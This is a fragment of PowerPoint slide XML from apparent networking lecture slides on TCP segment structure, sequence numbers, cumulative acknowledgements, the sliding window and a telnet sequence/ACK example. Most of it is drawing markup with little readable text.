                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0550D8EB-16F1-AFE7-0838-28A599A70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314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F67E31F5-1336-7DDA-13B7-54253E4AC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7564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1" name="Rectangle 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D568874-A91E-AD2C-0F63-B6A4503CF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2814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2" name="Rectangle 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F678E89-C06E-7D00-A34B-C85918632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4889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3" name="Rectangle 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D954BF7-7CF1-6B73-5224-ABF145100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1727" y="3123626"/>
            <a:ext cx="65087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4" name="Rectangle 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9E3B7D6-4158-9BE5-BAE1-BD1DD1D07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6977" y="3123626"/>
            <a:ext cx="65087" cy="622300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/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5" name="Rectangle 78">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69B84CC7-D967-A93A-83F1-AA5055A06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4" y="3861814"/>
            <a:ext cx="3408363" cy="88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6" name="Rectangle 79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23549BB3-2D86-BEEB-829D-38746FE32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9" y="3014089"/>
            <a:ext cx="3408363" cy="88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7" name="Line 80">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C360548-0F66-D47D-E9F4-205E923F2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0864" y="3976114"/>
            <a:ext cx="868363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8" name="Line 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{398A4E0E-8122-A5C1-35EB-5325C45FD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902" y="3977701"/>
            <a:ext cx="86836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9" name="Line 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{308AB93B-FB44-27E2-E9A4-DF2811EE62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739" y="3976114"/>
            <a:ext cx="8016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0" name="Line 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB324547-9106-8E61-09B2-394765FA6BD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9827" y="3977701"/>
            <a:ext cx="52863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1" name="Line 87">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41D36B9D-C64C-3C23-BBF5-8686DC575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2939" y="3999926"/>
            <a:ext cx="0" cy="2333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2" name="Line 88">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8856C216-4DA5-9D82-6D38-F73A010807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1664" y="3995164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3" name="Line 89">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85B486EC-03E0-4B93-8902-2CBAD3B1C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0814" y="3995164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4" name="Line 90">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D77ED01-7704-BAE0-5BB7-03E334D5F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8039" y="3995164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5" name="Text Box 91">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2A195FE-92F6-5C72-BACF-04F28A0F0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114" y="4223764"/>
            <a:ext cx="6937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sent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ACKed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Text Box 92">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B041A798-D98C-22E4-1851-64C37093B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188" y="4230114"/>
            <a:ext cx="1139821" cy="68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sent, not-yet </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" alt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ACKed</a:t>
            </a:r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(“</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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in-flight”)</a:t>
            </a:r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Text Box 93">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0D875EC-2478-0C76-7F71-BE8B0FC34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9677" y="4225351"/>
            <a:ext cx="106680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usable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but not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yet sent</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Text Box 94">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DF4B134-0B04-D1C3-70B3-747CDD129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914" y="4230114"/>
            <a:ext cx="8191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not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usable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Text Box 96">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48691262-5B28-ABD1-9A44-8A3E53709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564" y="2658489"/>
            <a:ext cx="11318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window size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N</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="80" name="Group 99">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80326A2C-DF77-43EC-3150-816F04F95887}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="8696327" y="2882326"/>
            <a:ext cx="593725" cy="136525"/>
            <a:chOff x="4250" y="1692"/>
            <a:chExt cx="374" cy="86"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="81" name="Line 97">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBBD4418-A4A1-ADD4-649F-B92909FE3A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0" y="1738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2" name="Line 98">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDC8238C-973D-D3FB-4265-0B8DC7EB6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692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3" name="Group 100">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6876917-4BFD-4818-5FB8-01F307A36905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04152" y="2907726"/>
            <a:ext cx="593725" cy="136525"/>
            <a:chOff x="4250" y="1692"/>
            <a:chExt cx="374" cy="86"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="84" name="Line 101">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3535DF15-52B4-85E9-F033-BD2CE1045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7" y="1745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5" name="Line 102">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F414B6FD-4F03-96CA-1B2E-6EFD9F6E1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9" y="1699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6" name="Text Box 196">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C033F81-B74E-6913-1405-43AB06F39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014" y="3677664"/>
            <a:ext cx="3178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 sequence number space </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="87" name="Group 199">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61052D28-EC4F-C9F6-9C4F-42515B483AA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6321427" y="1140839"/>
            <a:ext cx="2952750" cy="1966912"/>
            <a:chOff x="2600" y="665"/>
            <a:chExt cx="1860" cy="1239"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="88" name="Rectangle 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD60E7BB-3443-DEB1-8216-D752E7C85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1028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9" name="Group 172">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C56D53D-CFF3-063A-D674-5F1338957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0" y="872"/>
              <a:ext cx="1252" cy="714"/>
              <a:chOff x="1976" y="2984"/>
              <a:chExt cx="1252" cy="714"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="92" name="Rectangle 173">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A20A681-39AA-72BC-6269-0CAF61990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" name="Text Box 174">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F4EC6CF-C8C1-80C1-EF0A-B5FA57B31C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1" y="2984"/>
                <a:ext cx="5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source port #</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="94" name="Text Box 175">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69A0818B-2F9B-0ECB-0D2B-1019A18599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" y="2987"/>
                <a:ext cx="491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dest port #</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="95" name="Text Box 176">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{295ED9F2-34F3-8EA5-8E61-3C94AF2678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sequence number</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="96" name="Text Box 177">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C2E90CC-7013-9511-C252-B971DC859B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6" y="3257"/>
                <a:ext cx="125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97" name="Text Box 178">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BBD4468-1339-26CA-12FD-19BA411594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3" y="3544"/>
                <a:ext cx="47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checksum</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="98" name="Line 179">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14977CCC-6CE0-DD92-A984-81AE8D3D1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9" name="Line 180">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D025AE8-1BE8-8D58-7E6B-9DCD14848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" name="Line 181">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7D09EFB-3748-8FC1-2479-1D271776F7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1" name="Line 182">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19D656BE-0926-4756-56A0-A1D877DC9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2" name="Line 183">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDF44BA2-AFC5-BD9C-ABE5-7CAC39B789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3" name="Line 184">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BED2D7F-EBC3-5C77-A294-C95FBC1371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4" name="Text Box 185">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1811BE16-89A6-4DB9-ADBA-22DF7B3B24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8" y="3390"/>
                <a:ext cx="32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rwnd</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="105" name="Text Box 186">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25DDC711-EE63-51A0-C138-B6BD4C05DE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1" y="3544"/>
                <a:ext cx="4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urg pointer</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="106" name="Line 187">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7A7F3FA-5DFD-FF1B-A795-57B42BAAB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7" name="Line 188">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EDB4021-4093-B90D-C21A-3937963DE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0" name="Text Box 189">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{388D5E8A-D1D2-CFD3-9DF2-AC3E6E6BA9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0" y="665"/>
              <a:ext cx="186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outgoing segment from sender</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="91" name="Freeform 190">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9F7CEE4-6E0B-BB6F-EB44-3E06B7479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1080"/>
              <a:ext cx="107" cy="82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337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8" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE5BFE4D-CD3E-EB6D-5AF0-7BCF5DB6A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571" y="2803512"/>
            <a:ext cx="5096669" cy="176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4950" marR="0" lvl="0" indent="-1238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Acknowledgements</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2800" b="0" i="0" u="sng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:</a:t>
            </a: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63500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seq # of next byte expected from other side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="63500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cumulative ACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E7914C0-E25D-ACD4-8960-F8F9F92A4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71" y="4633906"/>
            <a:ext cx="5096669" cy="17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4950" marR="0" lvl="0" indent="-123825" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="19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sng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Q</a:t>
            </a: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:</a:t>
            </a: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 how receiver handles out-of-order segments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="63500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sng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 </a:t>
            </a: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spec doesn</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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’t say, - up to implementor</a:t>
            </a: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80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065B1A-66C7-43DD-903B-A3393C8C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TCP sequence numbers, ACKs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1FE1-AAC4-8B03-B5DA-049C0F79F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62DB1D77-B1A1-B128-A7E2-F58770BA1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117" y="4011734"/>
            <a:ext cx="2519185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ACKs receipt of echoed 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‘</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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</a:t>
            </a:r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B364CBF1-4547-E42F-28CF-0ACB0489B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477" y="3001865"/>
            <a:ext cx="31872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ACKs receipt of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‘</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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echoes </a:t>
            </a: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back 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‘</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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5515DA61-85EE-3C8A-82C8-B86BD3DD3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011" y="5644479"/>
            <a:ext cx="34018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simple telnet scenario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876F6296-9022-D198-1E9D-A4A5875CE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672" y="1492971"/>
            <a:ext cx="9973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B</a:t>
            </a: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AEC1E041-AEB2-0D5B-66C7-8598B3040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4390" y="1459336"/>
            <a:ext cx="10086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02AC03-C7D7-EAC6-F3F4-A54715D54531}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1499000" y="2541021"/>
            <a:ext cx="5581275" cy="780392"/>
            <a:chOff x="1499000" y="2541021"/>
            <a:chExt cx="5581275" cy="780392"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Line 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB4E20F6-DBB9-30B7-C054-7E593844D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237" y="2749913"/>
              <a:ext cx="2586037" cy="57150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02A6CBE0-FF48-1787-372C-2E2E92187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9000" y="2541021"/>
              <a:ext cx="2725007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 types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‘</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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endPara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B89FC43B-F26A-520A-9009-72862963B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037" y="2841988"/>
              <a:ext cx="814387" cy="379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" name="Text Box 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B9E348C-0743-A3E1-15BF-E8B49B9A8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0272" y="2854620"/>
              <a:ext cx="28200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Seq=42, ACK=79, data = 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‘</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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A646B8-2C79-D992-AFD1-78009ECEDEE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4264368" y="3523026"/>
            <a:ext cx="2813399" cy="800100"/>
            <a:chOff x="4264368" y="3523026"/>
            <a:chExt cx="2813399" cy="800100"/>
          </a:xfrm>
        </p:grpSpPr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C1F69B7B-9628-CCE7-95E0-C664D07509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4712" y="3523026"/>
              <a:ext cx="2554287" cy="80010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7BE929D8-0222-5731-B15B-FB1BC0576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1962" y="3800838"/>
              <a:ext cx="823912" cy="246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4CFFA64F-39AF-8DCB-DCF9-9B18FA0B9E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4368" y="3736718"/>
              <a:ext cx="281339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Seq=79, ACK=43, data = </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0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‘</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0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</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0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endPara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863CFF-3B55-DA4C-D854-90300AAC658C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4339949" y="4518388"/>
            <a:ext cx="2590800" cy="506413"/>
            <a:chOff x="4339949" y="4518388"/>
            <a:chExt cx="2590800" cy="506413"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Line 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0CB5623-FB8B-DCAE-DA1F-E64B00023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9949" y="4518388"/>
              <a:ext cx="2590800" cy="506413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id="{45B56C44-29E1-B098-6FC6-1EAECD477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637" y="4648563"/>
              <a:ext cx="9588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2" name="Text Box 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E54FA50-B1DA-6F77-7CAC-120AEB6A5E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4710" y="4609843"/>
              <a:ext cx="171226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Seq=43, ACK=80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23" name="Line 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC20E50A-F1DF-881F-7814-A78A3C322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2012" y="2508613"/>
            <a:ext cx="0" cy="258762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18EDF8C-18D6-7E62-18F3-853434C6D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4249" y="2561001"/>
            <a:ext cx="0" cy="258762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5" name="Group 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F63B850A-54AD-1A19-659E-FD98A7441BA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3824012" y="1687876"/>
            <a:ext cx="755650" cy="782637"/>
            <a:chOff x="-44" y="1473"/>
            <a:chExt cx="981" cy="1105"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="Picture 28" descr="desktop_computer_stylized_medium">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{549A9F37-18B2-46D5-356A-2D2A87FE0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E0F23135-E29A-912C-6449-BAB706EB7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" name="Group 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CC7C604-12CC-EA84-4C1E-6B19F8C2BFC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86274" y="1727563"/>
            <a:ext cx="788988" cy="862013"/>
            <a:chOff x="-44" y="1473"/>
            <a:chExt cx="981" cy="1105"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="29" name="Picture 31" descr="desktop_computer_stylized_medium">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26591A4F-1BF1-8109-66D8-DB3726AC5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3DAC6AA1-FE00-CF33-584F-0E9537515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9AF226C-B305-BA91-EBF6-E0E34980ADDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4692316" y="2815389"/>
            <a:ext cx="1388485" cy="1371600"/>
            <a:chOff x="4692316" y="2815389"/>
            <a:chExt cx="1388485" cy="13716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72829D-B289-4153-3A68-A0627B11CCF2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5566610" y="3721768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E589875-6C80-6095-3A6B-3E5DAE9A7B52}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4692316" y="2815389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BA6C951-7B6C-E0EB-1939-F83A14FD8686}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="5117431" y="3224463"/>
              <a:ext cx="513348" cy="51334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3EC159-D11B-7F52-4A4E-9DC9550959EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4684295" y="3737810"/>
            <a:ext cx="1982043" cy="1307432"/>
            <a:chOff x="4692316" y="2815389"/>
            <a:chExt cx="1982043" cy="13074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5EBB656-264A-E98C-F6CF-53FCF3DCA0A5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6160168" y="3657600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2586E19-A477-EA38-B4DD-44540C5EC870}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4692316" y="2815389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2AC20A6-AF3A-B142-D85B-E5FF0A1D83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5557" y="3224463"/>
              <a:ext cx="970548" cy="52136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65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35BD-20F9-5919-400A-5C98150BD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MITRE ATTACK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67E0F-6C11-9013-F41C-1B781F1C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4350"/>
            <a:ext cx="10512547" cy="4152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633D3-48ED-FC45-025E-02D886EED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Security: 8- </a:t>
            </a:r>
            <a:fld id="{C4204591-24BD-A542-B9D5-F8D8A88D2FE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DADAB-1F64-597E-A223-A33D12DB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TCP connection management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1C417-7A26-9629-ED08-B15B5E703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E6E9E3-CAB3-B3F4-D0F8-343A07BAE91C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="785243" y="1329399"/>
